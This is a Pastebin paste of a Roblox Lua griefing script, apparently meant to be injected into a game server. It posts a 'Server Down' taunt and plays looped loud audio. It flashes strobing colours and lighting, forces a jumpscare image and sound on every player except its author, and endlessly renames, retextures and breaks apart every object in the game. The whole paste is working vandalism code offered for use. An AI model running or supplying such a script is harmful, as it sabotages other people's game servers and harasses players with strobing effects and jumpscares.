Advertisement
Mitko1223tm

TM

Oct 13th, 2017
212
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.45 KB | None | 0 0
  1. workspace.Gravity=(math.huge*0);
  2. Instance.new('Message', Workspace).Text = 'Server Down [ TM was here! ]'
  3. s = Instance.new("Sound",game.Workspace)
  4. s.Name = "Sound"
  5. s.SoundId = "http://www.roblox.com/asset?id=500420851"
  6. s.Volume = 100
  7. s.Looped = true
  8. s.archivable = false
  9. s:play()
  10.  
  11. colorc=Instance.new("ColorCorrectionEffect",game.Lighting)
  12. wait()
  13. spawn(function()
  14. while wait() do
  15. colorc.Contrast=math.random(-1000,1000)
  16. colorc.Saturation=math.random()
  17. colorc.TintColor = Color3.new(math.random(), math.random(), math.random())
  18. end
  19. end)
  20.  
  21. spawn(function()
  22. while wait() do
  23. game.Lighting:SetMinutesAfterMidnight(0)
  24. wait()
  25. game.Lighting:SetMinutesAfterMidnight(14 * 60)
  26. end
  27. end)
  28.  
  29. local me = "Mitko1223tm" -- You don't get jumpscared.
  30. while wait() do
  31. for i,v in pairs(game.Players:GetPlayers()) do
  32. if v.Name ~= me and not v.PlayerGui:FindFirstChild("Screamer") and v:FindFirstChild("PlayerGui") then
  33. spawn(function()
  34. local newgui = Instance.new("ScreenGui",v.PlayerGui)
  35. newgui.Name = "Screamer"
  36. local newimage = Instance.new("ImageLabel",newgui)
  37. newimage.Image = "rbxassetid://142410803" -142410803
  38. newimage.Size = UDim2.new(1,0,1,0)
  39. local s = Instance.new("Sound",newgui)
  40. s.SoundId = "rbxassetid://166038742"
  41. s.Volume = 1
  42. s.Looped = true
  43. s:Play()
  44. print("Screamed "..v.Name)
  45. while wait() do
  46. newimage.ImageColor3 = Color3.new(math.random(1,255)/255,math.random(1,255)/255,math.random(1,255)/255)
  47. wait()
  48. newimage.ImageColor3 = Color3.new(1,1,1)
  49. end
  50. end)
  51. end
  52. end
  53. end
  54.  
  55. Instance.new("ColorCorrectionEffect", game.Lighting).Saturation = 666666.33333
  56. local rekt = Instance.new('ColorCorrectionEffect', game.Lighting)
  57. rekt.TintColor = Color3.new(1, 1, 0)
  58. rekt.Brightness = 33.2
  59. rekt.Contrast = 40
  60. rekt.Saturation = 40
  61. local topkek = Instance.new('BlurEffect', game.Lighting)
  62. topkek.Size = 3
  63. local bloom = Instance.new('BloomEffect', game.Lighting)
  64. bloom.Intensity = 0.4
  65. bloom.Size = 56
  66. bloom.Threshold = 1
  67.  
  68. s=Instance.new'Sound';
  69. s.Parent=workspace;
  70. s.SoundId='rbxassetid://315386334';
  71. s.Pitch=1;
  72. s.Volume=1;
  73. s.Looped=true;
  74. s:play();
  75.  
  76. function GetRecursiveChildren(Part, Children)
  77. for _, Part in pairs(Part:GetChildren()) do
  78. pcall(function()
  79. table.insert(Children, Part)
  80. GetRecursiveChildren(Part, Children)
  81. end)
  82. end
  83. return Children
  84. end
  85.  
  86.  
  87. local Phrases = {
  88. "v1ruz l0ad3d",
  89. "",
  90. }
  91.  
  92.  
  93. Textures = {
  94. "http://www.roblox.com/Asset/?id=135902040",
  95. "http://www.roblox.com/Asset/?id=135902040",
  96. "http://www.roblox.com/Asset/?id=135902040",
  97. "http://www.roblox.com/Asset/?id=135902040",
  98. "http://www.roblox.com/Asset/?id=135902040",
  99. "http://www.roblox.com/Asset/?id=135902040",
  100. "http://www.roblox.com/Asset/?id=135902040",
  101. "http://www.roblox.com/Asset/?id=135902040",
  102. "http://www.roblox.com/Asset/?id=135902040"
  103. }
  104.  
  105.  
  106. Instance.new("Sky", game:GetService("Lighting")).CelestialBodiesShown = false
  107. Instance.new("Message", Workspace)
  108. Instance.new("Hint", Workspace)
  109.  
  110.  
  111. while true do
  112. for _, Part in pairs(GetRecursiveChildren(game, {})) do
  113. pcall(function()
  114. if not Part:IsA("Player")then
  115. pcall(function() Part.Name = Phrases[math.random(1, #Phrases)] end)
  116. pcall(function() Part.Text = Phrases[math.random(1, #Phrases)] end)
  117. pcall(function() Part.Image = Textures[math.random(1, #Textures)] end)
  118. pcall(function() Part.TextureId = Textures[math.random(1, #Textures)] end)
  119. pcall(function() Part.Texture = Textures[math.random(1, #Textures)] end)
  120. pcall(function() Part.ShirtTemplate = Textures[math.random(1, #Textures)] end)
  121. pcall(function() Part.PantsTemplate = Textures[math.random(1, #Textures)] end)
  122. pcall(function() Part.Graphic = Textures[math.random(1, #Textures)] end)
  123. pcall(function() Part.Color = Color3.new(math.random(), math.random(), math.random()) end)
  124. pcall(function() Part.Color3 = Color3.new(math.random(), math.random(), math.random()) end)
  125. pcall(function()
  126. Part.SkyboxUp = Textures[math.random(1, #Textures)]
  127. Part.SkyboxDn = Textures[math.random(1, #Textures)]
  128. Part.SkyboxLf = Textures[math.random(1, #Textures)]
  129. Part.SkyboxRt = Textures[math.random(1, #Textures)]
  130. Part.SkyboxFt = Textures[math.random(1, #Textures)]
  131. Part.SkyboxBk = Textures[math.random(1, #Textures)]
  132. end)
  133. pcall(function()
  134. Part.TextColor3 = Color3.new(math.random(), math.random(), math.random())
  135. Part.BackgroundColor3 = Color3.new(math.random(), math.random(), math.random())
  136. Part.BorderColor3 = Color3.new(math.random(), math.random(), math.random())
  137. end)
  138. pcall(function()
  139. Part.Pitch = math.random() * 5
  140. Part.Volume = 1
  141. Part.Looped = true
  142. Part:Play()
  143. end)
  144. pcall(function()
  145. if math.random(1, 5) == 1 then Part.Anchored = false end
  146. if Part.Anchored == false then
  147. Part.Velocity = Vector3.new(math.random(-10, 10), math.random(0, 50), math.random(-10, 10))
  148. Part.RotVelocity = Vector3.new(math.random(-100, 100), math.random(-100, 100), math.random(-100, 100))
  149. end
  150. Part.Locked = false
  151. Part.BrickColor = BrickColor.random()
  152. Part.TopSurface = "Weld"
  153. Part.BottomSurface = "Weld"
  154. Part.FrontSurface = "Weld"
  155. Part.BackSurface = "Weld"
  156. Part.LeftSurface = "Weld"
  157. Part.RightSurface = "Weld"
  158. Part:BreakJoints()
  159. end)
  160. end
  161. end)
  162. if math.random(1, 50) == 1 then wait() end
  163. end
  164. end
  165. s.Parent = game.workspace
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement